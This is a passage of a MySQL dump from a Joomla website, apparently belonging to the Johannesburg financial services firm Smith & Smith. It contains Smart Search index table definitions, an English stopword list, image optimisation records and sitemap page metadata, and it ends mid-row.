KEY `idx_term_weight` (`term_id`,`weight`),
KEY `idx_link_term_weight` (`link_id`,`term_id`,`weight`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `vzx9b_finder_links_terms9`
--
LOCK TABLES `vzx9b_finder_links_terms9` WRITE;
/*!40000 ALTER TABLE `vzx9b_finder_links_terms9` DISABLE KEYS */;
/*!40000 ALTER TABLE `vzx9b_finder_links_terms9` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `vzx9b_finder_links_termsa`
--
DROP TABLE IF EXISTS `vzx9b_finder_links_termsa`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `vzx9b_finder_links_termsa` (
`link_id` int(10) unsigned NOT NULL,
`term_id` int(10) unsigned NOT NULL,
`weight` float unsigned NOT NULL,
PRIMARY KEY (`link_id`,`term_id`),
KEY `idx_term_weight` (`term_id`,`weight`),
KEY `idx_link_term_weight` (`link_id`,`term_id`,`weight`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `vzx9b_finder_links_termsa`
--
LOCK TABLES `vzx9b_finder_links_termsa` WRITE;
/*!40000 ALTER TABLE `vzx9b_finder_links_termsa` DISABLE KEYS */;
/*!40000 ALTER TABLE `vzx9b_finder_links_termsa` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `vzx9b_finder_links_termsb`
--
DROP TABLE IF EXISTS `vzx9b_finder_links_termsb`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `vzx9b_finder_links_termsb` (
`link_id` int(10) unsigned NOT NULL,
`term_id` int(10) unsigned NOT NULL,
`weight` float unsigned NOT NULL,
PRIMARY KEY (`link_id`,`term_id`),
KEY `idx_term_weight` (`term_id`,`weight`),
KEY `idx_link_term_weight` (`link_id`,`term_id`,`weight`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `vzx9b_finder_links_termsb`
--
LOCK TABLES `vzx9b_finder_links_termsb` WRITE;
/*!40000 ALTER TABLE `vzx9b_finder_links_termsb` DISABLE KEYS */;
/*!40000 ALTER TABLE `vzx9b_finder_links_termsb` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `vzx9b_finder_links_termsc`
--
DROP TABLE IF EXISTS `vzx9b_finder_links_termsc`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `vzx9b_finder_links_termsc` (
`link_id` int(10) unsigned NOT NULL,
`term_id` int(10) unsigned NOT NULL,
`weight` float unsigned NOT NULL,
PRIMARY KEY (`link_id`,`term_id`),
KEY `idx_term_weight` (`term_id`,`weight`),
KEY `idx_link_term_weight` (`link_id`,`term_id`,`weight`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `vzx9b_finder_links_termsc`
--
LOCK TABLES `vzx9b_finder_links_termsc` WRITE;
/*!40000 ALTER TABLE `vzx9b_finder_links_termsc` DISABLE KEYS */;
/*!40000 ALTER TABLE `vzx9b_finder_links_termsc` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `vzx9b_finder_links_termsd`
--
DROP TABLE IF EXISTS `vzx9b_finder_links_termsd`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `vzx9b_finder_links_termsd` (
`link_id` int(10) unsigned NOT NULL,
`term_id` int(10) unsigned NOT NULL,
`weight` float unsigned NOT NULL,
PRIMARY KEY (`link_id`,`term_id`),
KEY `idx_term_weight` (`term_id`,`weight`),
KEY `idx_link_term_weight` (`link_id`,`term_id`,`weight`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `vzx9b_finder_links_termsd`
--
LOCK TABLES `vzx9b_finder_links_termsd` WRITE;
/*!40000 ALTER TABLE `vzx9b_finder_links_termsd` DISABLE KEYS */;
/*!40000 ALTER TABLE `vzx9b_finder_links_termsd` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `vzx9b_finder_links_termse`
--
DROP TABLE IF EXISTS `vzx9b_finder_links_termse`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `vzx9b_finder_links_termse` (
`link_id` int(10) unsigned NOT NULL,
`term_id` int(10) unsigned NOT NULL,
`weight` float unsigned NOT NULL,
PRIMARY KEY (`link_id`,`term_id`),
KEY `idx_term_weight` (`term_id`,`weight`),
KEY `idx_link_term_weight` (`link_id`,`term_id`,`weight`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `vzx9b_finder_links_termse`
--
LOCK TABLES `vzx9b_finder_links_termse` WRITE;
/*!40000 ALTER TABLE `vzx9b_finder_links_termse` DISABLE KEYS */;
/*!40000 ALTER TABLE `vzx9b_finder_links_termse` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `vzx9b_finder_links_termsf`
--
DROP TABLE IF EXISTS `vzx9b_finder_links_termsf`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `vzx9b_finder_links_termsf` (
`link_id` int(10) unsigned NOT NULL,
`term_id` int(10) unsigned NOT NULL,
`weight` float unsigned NOT NULL,
PRIMARY KEY (`link_id`,`term_id`),
KEY `idx_term_weight` (`term_id`,`weight`),
KEY `idx_link_term_weight` (`link_id`,`term_id`,`weight`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `vzx9b_finder_links_termsf`
--
LOCK TABLES `vzx9b_finder_links_termsf` WRITE;
/*!40000 ALTER TABLE `vzx9b_finder_links_termsf` DISABLE KEYS */;
/*!40000 ALTER TABLE `vzx9b_finder_links_termsf` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `vzx9b_finder_taxonomy`
--
DROP TABLE IF EXISTS `vzx9b_finder_taxonomy`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `vzx9b_finder_taxonomy` (
`id` int(10) unsigned NOT NULL AUTO_INCREMENT,
`parent_id` int(10) unsigned NOT NULL DEFAULT 0,
`title` varchar(255) NOT NULL,
`state` tinyint(1) unsigned NOT NULL DEFAULT 1,
`access` tinyint(1) unsigned NOT NULL DEFAULT 0,
`ordering` tinyint(1) unsigned NOT NULL DEFAULT 0,
PRIMARY KEY (`id`),
KEY `parent_id` (`parent_id`),
KEY `state` (`state`),
KEY `ordering` (`ordering`),
KEY `access` (`access`),
KEY `idx_parent_published` (`parent_id`,`state`,`access`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `vzx9b_finder_taxonomy`
--
LOCK TABLES `vzx9b_finder_taxonomy` WRITE;
/*!40000 ALTER TABLE `vzx9b_finder_taxonomy` DISABLE KEYS */;
/*!40000 ALTER TABLE `vzx9b_finder_taxonomy` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `vzx9b_finder_taxonomy_map`
--
DROP TABLE IF EXISTS `vzx9b_finder_taxonomy_map`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `vzx9b_finder_taxonomy_map` (
`link_id` int(10) unsigned NOT NULL,
`node_id` int(10) unsigned NOT NULL,
PRIMARY KEY (`link_id`,`node_id`),
KEY `link_id` (`link_id`),
KEY `node_id` (`node_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `vzx9b_finder_taxonomy_map`
--
LOCK TABLES `vzx9b_finder_taxonomy_map` WRITE;
/*!40000 ALTER TABLE `vzx9b_finder_taxonomy_map` DISABLE KEYS */;
/*!40000 ALTER TABLE `vzx9b_finder_taxonomy_map` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `vzx9b_finder_terms`
--
DROP TABLE IF EXISTS `vzx9b_finder_terms`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `vzx9b_finder_terms` (
`term_id` int(10) unsigned NOT NULL AUTO_INCREMENT,
`term` varchar(75) NOT NULL,
`stem` varchar(75) NOT NULL,
`common` tinyint(1) unsigned NOT NULL DEFAULT 0,
`phrase` tinyint(1) unsigned NOT NULL DEFAULT 0,
`weight` float unsigned NOT NULL DEFAULT 0,
`soundex` varchar(75) NOT NULL,
`links` int(10) NOT NULL DEFAULT 0,
`language` char(3) NOT NULL DEFAULT '',
PRIMARY KEY (`term_id`),
UNIQUE KEY `idx_term` (`term`),
KEY `idx_term_phrase` (`term`,`phrase`),
KEY `idx_stem_phrase` (`stem`,`phrase`),
KEY `idx_soundex_phrase` (`soundex`,`phrase`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `vzx9b_finder_terms`
--
LOCK TABLES `vzx9b_finder_terms` WRITE;
/*!40000 ALTER TABLE `vzx9b_finder_terms` DISABLE KEYS */;
/*!40000 ALTER TABLE `vzx9b_finder_terms` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `vzx9b_finder_terms_common`
--
DROP TABLE IF EXISTS `vzx9b_finder_terms_common`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `vzx9b_finder_terms_common` (
`term` varchar(75) NOT NULL,
`language` varchar(3) NOT NULL,
KEY `idx_word_lang` (`term`,`language`),
KEY `idx_lang` (`language`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `vzx9b_finder_terms_common`
--
LOCK TABLES `vzx9b_finder_terms_common` WRITE;
/*!40000 ALTER TABLE `vzx9b_finder_terms_common` DISABLE KEYS */;
INSERT INTO `vzx9b_finder_terms_common` VALUES ('a','en'),('about','en'),('after','en'),('ago','en'),('all','en'),('am','en'),('an','en'),('and','en'),('ani','en'),('any','en'),('are','en'),('aren\'t','en'),('as','en'),('at','en'),('be','en'),('but','en'),('by','en'),('for','en'),('from','en'),('get','en'),('go','en'),('how','en'),('if','en'),('in','en'),('into','en'),('is','en'),('isn\'t','en'),('it','en'),('its','en'),('me','en'),('more','en'),('most','en'),('must','en'),('my','en'),('new','en'),('no','en'),('none','en'),('not','en'),('noth','en'),('nothing','en'),('of','en'),('off','en'),('often','en'),('old','en'),('on','en'),('onc','en'),('once','en'),('onli','en'),('only','en'),('or','en'),('other','en'),('our','en'),('ours','en'),('out','en'),('over','en'),('page','en'),('she','en'),('should','en'),('small','en'),('so','en'),('some','en'),('than','en'),('thank','en'),('that','en'),('the','en'),('their','en'),('theirs','en'),('them','en'),('then','en'),('there','en'),('these','en'),('they','en'),('this','en'),('those','en'),('thus','en'),('time','en'),('times','en'),('to','en'),('too','en'),('true','en'),('under','en'),('until','en'),('up','en'),('upon','en'),('use','en'),('user','en'),('users','en'),('veri','en'),('version','en'),('very','en'),('via','en'),('want','en'),('was','en'),('way','en'),('were','en'),('what','en'),('when','en'),('where','en'),('whi','en'),('which','en'),('who','en'),('whom','en'),('whose','en'),('why','en'),('wide','en'),('will','en'),('with','en'),('within','en'),('without','en'),('would','en'),('yes','en'),('yet','en'),('you','en'),('your','en'),('yours','en');
/*!40000 ALTER TABLE `vzx9b_finder_terms_common` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `vzx9b_finder_tokens`
--
DROP TABLE IF EXISTS `vzx9b_finder_tokens`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `vzx9b_finder_tokens` (
`term` varchar(75) NOT NULL,
`stem` varchar(75) NOT NULL,
`common` tinyint(1) unsigned NOT NULL DEFAULT 0,
`phrase` tinyint(1) unsigned NOT NULL DEFAULT 0,
`weight` float unsigned NOT NULL DEFAULT 1,
`context` tinyint(1) unsigned NOT NULL DEFAULT 2,
`language` char(3) NOT NULL DEFAULT '',
KEY `idx_word` (`term`),
KEY `idx_context` (`context`)
) ENGINE=MEMORY DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `vzx9b_finder_tokens`
--
LOCK TABLES `vzx9b_finder_tokens` WRITE;
/*!40000 ALTER TABLE `vzx9b_finder_tokens` DISABLE KEYS */;
/*!40000 ALTER TABLE `vzx9b_finder_tokens` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `vzx9b_finder_tokens_aggregate`
--
DROP TABLE IF EXISTS `vzx9b_finder_tokens_aggregate`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `vzx9b_finder_tokens_aggregate` (
`term_id` int(10) unsigned NOT NULL,
`map_suffix` char(1) NOT NULL,
`term` varchar(75) NOT NULL,
`stem` varchar(75) NOT NULL,
`common` tinyint(1) unsigned NOT NULL DEFAULT 0,
`phrase` tinyint(1) unsigned NOT NULL DEFAULT 0,
`term_weight` float unsigned NOT NULL,
`context` tinyint(1) unsigned NOT NULL DEFAULT 2,
`context_weight` float unsigned NOT NULL,
`total_weight` float unsigned NOT NULL,
`language` char(3) NOT NULL DEFAULT '',
KEY `token` (`term`),
KEY `keyword_id` (`term_id`)
) ENGINE=MEMORY DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `vzx9b_finder_tokens_aggregate`
--
LOCK TABLES `vzx9b_finder_tokens_aggregate` WRITE;
/*!40000 ALTER TABLE `vzx9b_finder_tokens_aggregate` DISABLE KEYS */;
/*!40000 ALTER TABLE `vzx9b_finder_tokens_aggregate` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `vzx9b_finder_types`
--
DROP TABLE IF EXISTS `vzx9b_finder_types`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `vzx9b_finder_types` (
`id` int(10) unsigned NOT NULL AUTO_INCREMENT,
`title` varchar(100) NOT NULL,
`mime` varchar(100) NOT NULL,
PRIMARY KEY (`id`),
UNIQUE KEY `title` (`title`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `vzx9b_finder_types`
--
LOCK TABLES `vzx9b_finder_types` WRITE;
/*!40000 ALTER TABLE `vzx9b_finder_types` DISABLE KEYS */;
/*!40000 ALTER TABLE `vzx9b_finder_types` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `vzx9b_imagerecycle_files`
--
DROP TABLE IF EXISTS `vzx9b_imagerecycle_files`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `vzx9b_imagerecycle_files` (
`id` int(11) NOT NULL AUTO_INCREMENT,
`file` varchar(250) NOT NULL,
`md5` varchar(32) NOT NULL,
`extension` varchar(5) NOT NULL,
`api_id` int(11) NOT NULL,
`size_before` int(11) NOT NULL,
`size_after` int(11) NOT NULL,
`date` datetime NOT NULL,
`expiration_date` datetime NOT NULL,
`status` varchar(32) NOT NULL,
PRIMARY KEY (`id`),
UNIQUE KEY `file` (`file`)
) ENGINE=MyISAM AUTO_INCREMENT=21 DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `vzx9b_imagerecycle_files`
--
LOCK TABLES `vzx9b_imagerecycle_files` WRITE;
/*!40000 ALTER TABLE `vzx9b_imagerecycle_files` DISABLE KEYS */;
INSERT INTO `vzx9b_imagerecycle_files` VALUES (1,'images/corporate.jpg','a2007809952a75b73dfc728efe4ceda3','',8413150,54917,54899,'2016-08-21 11:30:09','2016-09-20 12:30:08',''),(2,'images/services-corporate-medical.jpg','a5f523631ccffca69ca6d69e753f93ce','',10293215,17485,13313,'2016-10-31 11:24:55','2016-11-30 05:24:53','O'),(3,'images/services-corporate.jpg','2c805e09e470bb47d980f9acc20f52fe','',13288275,32983,25698,'2017-01-23 23:44:08','2017-02-23 00:44:08','O'),(4,'images/services-insurance.jpg','6c413eedb74cb668abe7a173cf9a6c00','',13288279,18102,14856,'2017-01-23 23:44:12','2017-02-23 00:44:12','O'),(5,'images/services-life-cover.jpg','4e8d79e7aad6afcdd6b76f2941f7cbc7','',13288282,22526,17783,'2017-01-23 23:44:16','2017-02-23 00:44:16','O'),(6,'images/services-medical-aid.jpg','3dd5265726128fb25ce30b79f77d12d8','',13288285,13652,10662,'2017-01-23 23:44:20','2017-02-23 00:44:20','O'),(7,'images/services-short-term-insurance.jpg','6c413eedb74cb668abe7a173cf9a6c00','',13288288,18102,14856,'2017-01-23 23:44:25','2017-02-23 00:44:24','O'),(8,'images/smith-and-smith-images-about-us.jpg','a89b89ab73eff9144b14049da58afc79','',13288290,22950,22905,'2017-01-23 23:44:28','2017-02-23 00:44:28','O'),(9,'images/smith-and-smith-images-commercial.jpg','dc4f01b5fc3a8150318ae331f1e761db','',13288293,14264,14219,'2017-01-23 23:44:33','2017-02-23 00:44:32','O'),(10,'images/smith-and-smith-images-personal-solutions.jpg','841cdd2aa245534b374cb7355616a2ea','',13288296,31287,30869,'2017-01-23 23:44:37','2017-02-23 00:44:37','O'),(11,'images/smith-and-smith-logo.png','344738079c0db39aed5bd16e6912d1e9','',13288300,1815,1583,'2017-01-23 23:44:42','2017-02-23 00:44:42','O'),(12,'images/smith-and-smith-service-panels-01.jpg','666614ca264b050c17d48bdccad50764','',13288303,8274,8229,'2017-01-23 23:44:47','2017-02-23 00:44:47','O'),(13,'images/smith-and-smith-service-panels-02.jpg','b7d07adefd15e2f3105c858fd30aa88f','',13288306,13787,13742,'2017-01-23 23:44:52','2017-02-23 00:44:52','O'),(14,'images/smith-and-smith-service-panels-03.jpg','8e30a351404203d27e3eb57afc2418ac','',13288309,5825,5780,'2017-01-23 23:44:57','2017-02-23 00:44:57','O'),(15,'images/smith-and-smith-sliders-01.jpg','1a848882c5c0c2087cea479d49fe4693','',13288313,97300,73369,'2017-01-23 23:45:02','2017-02-23 00:45:01','O'),(16,'templates/protostar/template_preview.png','20ec35973ef6e32cad671e18e051bf4f','',13288329,125180,50735,'2017-01-23 23:45:25','2017-02-23 00:45:24','O'),(17,'templates/beez3/template_preview.png','2c81e596a73610fb8151e94491234115','',13288335,118531,42381,'2017-01-23 23:45:32','2017-02-23 00:45:32','O'),(18,'templates/shaper_helix3/template_preview.png','0bcab81c0f853c26edc0a9290e3cca23','',13288341,116196,103100,'2017-01-23 23:45:38','2017-02-23 00:45:37','O'),(19,'templates/shaper_helix3/template_thumbnail.png','025170593ce4b19bfa5902d955f223c6','',13288354,15925,12978,'2017-01-23 23:45:51','2017-02-23 00:45:51','O'),(20,'templates/beez3/template_thumbnail.png','b188508fa540f351db9f9daefd8a3a96','',13288359,21957,9043,'2017-01-23 23:45:57','2017-02-23 00:45:56','O');
/*!40000 ALTER TABLE `vzx9b_imagerecycle_files` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `vzx9b_imagerecycle_options`
--
DROP TABLE IF EXISTS `vzx9b_imagerecycle_options`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `vzx9b_imagerecycle_options` (
`id` int(11) NOT NULL AUTO_INCREMENT,
`option_name` varchar(50) NOT NULL,
`option_value` mediumtext NOT NULL,
PRIMARY KEY (`id`),
UNIQUE KEY `option_name` (`option_name`)
) ENGINE=MyISAM AUTO_INCREMENT=7 DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `vzx9b_imagerecycle_options`
--
LOCK TABLES `vzx9b_imagerecycle_options` WRITE;
/*!40000 ALTER TABLE `vzx9b_imagerecycle_options` DISABLE KEYS */;
INSERT INTO `vzx9b_imagerecycle_options` VALUES (1,'queue_process_lastRun','0'),(2,'queue_process_status','0'),(3,'manual_start_optimzeAll','0'),(4,'ir_queue',''),(5,'process_startTime','0'),(6,'totalImagesProcessing','0');
/*!40000 ALTER TABLE `vzx9b_imagerecycle_options` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `vzx9b_jmap`
--
DROP TABLE IF EXISTS `vzx9b_jmap`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `vzx9b_jmap` (
`id` int(11) unsigned NOT NULL AUTO_INCREMENT,
`type` varchar(100) NOT NULL,
`name` text NOT NULL,
`description` text NOT NULL,
`checked_out` int(11) unsigned NOT NULL DEFAULT 0,
`checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`published` tinyint(1) NOT NULL DEFAULT 0,
`ordering` int(11) NOT NULL DEFAULT 0,
`sqlquery` text DEFAULT NULL,
`sqlquery_managed` text DEFAULT NULL,
`params` text NOT NULL,
PRIMARY KEY (`id`),
KEY `published` (`published`)
) ENGINE=InnoDB AUTO_INCREMENT=4 DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `vzx9b_jmap`
--
LOCK TABLES `vzx9b_jmap` WRITE;
/*!40000 ALTER TABLE `vzx9b_jmap` DISABLE KEYS */;
INSERT INTO `vzx9b_jmap` VALUES (1,'content','Content','Default contents source',0,'0000-00-00 00:00:00',0,1,'','',''),(2,'menu','Main Menu','Main Menu',0,'0000-00-00 00:00:00',1,3,NULL,NULL,''),(3,'menu','links','',0,'0000-00-00 00:00:00',1,2,NULL,NULL,'');
/*!40000 ALTER TABLE `vzx9b_jmap` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `vzx9b_jmap_cats_priorities`
--
DROP TABLE IF EXISTS `vzx9b_jmap_cats_priorities`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `vzx9b_jmap_cats_priorities` (
`id` int(11) NOT NULL,
`priority` char(3) NOT NULL,
PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `vzx9b_jmap_cats_priorities`
--
LOCK TABLES `vzx9b_jmap_cats_priorities` WRITE;
/*!40000 ALTER TABLE `vzx9b_jmap_cats_priorities` DISABLE KEYS */;
/*!40000 ALTER TABLE `vzx9b_jmap_cats_priorities` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `vzx9b_jmap_datasets`
--
DROP TABLE IF EXISTS `vzx9b_jmap_datasets`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `vzx9b_jmap_datasets` (
`id` int(11) unsigned NOT NULL AUTO_INCREMENT,
`name` text NOT NULL,
`description` text NOT NULL,
`checked_out` int(11) unsigned NOT NULL DEFAULT 0,
`checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`published` tinyint(1) NOT NULL DEFAULT 0,
`sources` text NOT NULL,
PRIMARY KEY (`id`),
KEY `published` (`published`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `vzx9b_jmap_datasets`
--
LOCK TABLES `vzx9b_jmap_datasets` WRITE;
/*!40000 ALTER TABLE `vzx9b_jmap_datasets` DISABLE KEYS */;
/*!40000 ALTER TABLE `vzx9b_jmap_datasets` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `vzx9b_jmap_dss_relations`
--
DROP TABLE IF EXISTS `vzx9b_jmap_dss_relations`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `vzx9b_jmap_dss_relations` (
`datasetid` int(11) NOT NULL,
`datasourceid` int(11) NOT NULL,
PRIMARY KEY (`datasetid`,`datasourceid`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `vzx9b_jmap_dss_relations`
--
LOCK TABLES `vzx9b_jmap_dss_relations` WRITE;
/*!40000 ALTER TABLE `vzx9b_jmap_dss_relations` DISABLE KEYS */;
/*!40000 ALTER TABLE `vzx9b_jmap_dss_relations` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `vzx9b_jmap_google`
--
DROP TABLE IF EXISTS `vzx9b_jmap_google`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `vzx9b_jmap_google` (
`id` int(11) NOT NULL,
`token` text DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `vzx9b_jmap_google`
--
LOCK TABLES `vzx9b_jmap_google` WRITE;
/*!40000 ALTER TABLE `vzx9b_jmap_google` DISABLE KEYS */;
/*!40000 ALTER TABLE `vzx9b_jmap_google` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `vzx9b_jmap_menu_priorities`
--
DROP TABLE IF EXISTS `vzx9b_jmap_menu_priorities`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `vzx9b_jmap_menu_priorities` (
`id` int(11) NOT NULL,
`priority` char(3) NOT NULL,
PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `vzx9b_jmap_menu_priorities`
--
LOCK TABLES `vzx9b_jmap_menu_priorities` WRITE;
/*!40000 ALTER TABLE `vzx9b_jmap_menu_priorities` DISABLE KEYS */;
/*!40000 ALTER TABLE `vzx9b_jmap_menu_priorities` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `vzx9b_jmap_metainfo`
--
DROP TABLE IF EXISTS `vzx9b_jmap_metainfo`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `vzx9b_jmap_metainfo` (
`id` int(11) unsigned NOT NULL AUTO_INCREMENT,
`linkurl` varchar(600) NOT NULL,
`meta_title` text DEFAULT NULL,
`meta_desc` text DEFAULT NULL,
`meta_image` varchar(255) DEFAULT NULL,
`robots` varchar(255) DEFAULT NULL,
`published` tinyint(1) NOT NULL DEFAULT 0,
`excluded` tinyint(1) NOT NULL DEFAULT 0,
PRIMARY KEY (`id`),
KEY `robots` (`robots`),
KEY `published` (`published`)
) ENGINE=InnoDB AUTO_INCREMENT=7 DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `vzx9b_jmap_metainfo`
--
LOCK TABLES `vzx9b_jmap_metainfo` WRITE;
/*!40000 ALTER TABLE `vzx9b_jmap_metainfo` DISABLE KEYS */;
INSERT INTO `vzx9b_jmap_metainfo` VALUES (1,'https://smithandsmith.co.za/','Registered financial services provider in Johannesburg','Smith & Smith is a registered financial services provider with the Financial Services Board and supports the initiative on accreditation of financial advisors.','images/smith-and-smith-logo.png','',1,0),(2,'https://smithandsmith.co.za/about-smith-and-smith-financial-solutions','Smith & Smith - Registered Financial Service Provider in Johannesburg','highest levels of knowledge and experience in all financial disciplines – from healthcare to short-term insurance, investment planning and life assurance – we deal with corporates as well as individuals.','images/smith-and-smith-images-about-us.jpg','',1,0),(3,'https://smithandsmith.co.za/faq-s','FAQ\'s Financial and Health solutions from Smith & Smith, Johannesburg','Frequently Asked Questions - Confused about financial terms or the difference between life insurance and life assurance? Our list of frequently asked questions aims to put serious matters into simple terms.','images/services-insurance.jpg','',1,0),(4,'https://smithandsmith.co.za/smith-and-smith-personal-solutions','Personal Financial and Health solutions from Smith & Smith','Smith & Smith provides personal solutions covering everything that is required for you to live your life without having to worry about the “what ifs”. With our easy-to-understand approach, we offer complete solutions that fit your individual needs and circumstances.','images/smith-and-smith-images-personal-solutions.jpg','',1,0),(5,'https://smithandsmith.co.za/smith-and-smith-corporate-solutions','Corporate Financial & Health solutions from Smith & Smith Johannesburg','Owning your own business comes with many unique responsibilities, risks and investment opportunities. We offer comprehensive business insurance products as well as affordable group healthcare coverage and investment solutions that suit your enterprise’s specific 